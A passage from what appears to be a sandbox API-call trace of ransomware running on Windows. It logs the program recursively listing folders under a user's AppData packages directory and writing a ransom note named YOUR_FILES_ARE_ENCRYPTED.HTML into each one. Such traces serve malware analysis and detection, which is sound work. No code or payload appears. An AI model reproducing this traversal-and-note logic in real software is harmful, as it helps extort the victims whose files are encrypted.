cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.841] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.841] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.841] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.841] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache") returned 96 [0115.841] GetProcessHeap () returned 0x600000 [0115.841] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.843] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache" [0115.843] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache\\*" [0115.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.844] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0115.844] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 0 [0115.844] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.844] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.844] GetProcessHeap () returned 0x600000 [0115.844] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.846] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.847] CloseHandle (hObject=0x320) returned 1 [0115.847] GetProcessHeap () returned 0x600000 [0115.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.847] GetProcessHeap () returned 0x600000 [0115.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.848] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.848] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.848] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies") returned 98 [0115.849] GetProcessHeap () returned 0x600000 [0115.849] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.850] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies" [0115.850] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0115.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x626878 [0115.851] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0115.851] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 0 [0115.851] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0115.851] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.851] GetProcessHeap () returned 0x600000 [0115.851] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.853] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.854] CloseHandle (hObject=0x320) returned 1 [0115.854] GetProcessHeap () returned 0x600000 [0115.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.854] GetProcessHeap () returned 0x600000 [0115.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.854] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.855] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.855] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory") returned 98 [0115.855] GetProcessHeap () returned 0x600000 [0115.855] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.855] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory" [0115.855] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0115.855] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.855] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0115.855] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 0 [0115.855] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.855] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.855] GetProcessHeap () returned 0x600000 [0115.855] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.856] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.858] CloseHandle (hObject=0x320) returned 1 [0115.858] GetProcessHeap () returned 0x600000 [0115.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.858] GetProcessHeap () returned 0x600000 [0115.858] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.859] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.859] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.859] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp") returned 91 [0115.859] GetProcessHeap () returned 0x600000 [0115.859] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.861] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp" [0115.861] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp\\*" [0115.862] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.862] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0115.862] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 0 [0115.862] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.862] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0115.862] GetProcessHeap () returned 0x600000 [0115.862] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.864] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.865] CloseHandle (hObject=0x320) returned 1 [0115.865] GetProcessHeap () returned 0x600000 [0115.865] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.865] GetProcessHeap () returned 0x600000 [0115.865] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.866] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192ee3a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x192ee3a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x192ee3a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.866] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.866] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0115.867] GetProcessHeap () returned 0x600000 [0115.867] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.868] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.869] CloseHandle (hObject=0x324) returned 1 [0115.869] GetProcessHeap () returned 0x600000 [0115.869] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.869] GetProcessHeap () returned 0x600000 [0115.869] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.869] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.869] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.869] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData") returned 91 [0115.869] GetProcessHeap () returned 0x600000 [0115.869] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.869] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\AppData" [0115.869] lstrcatW (in: 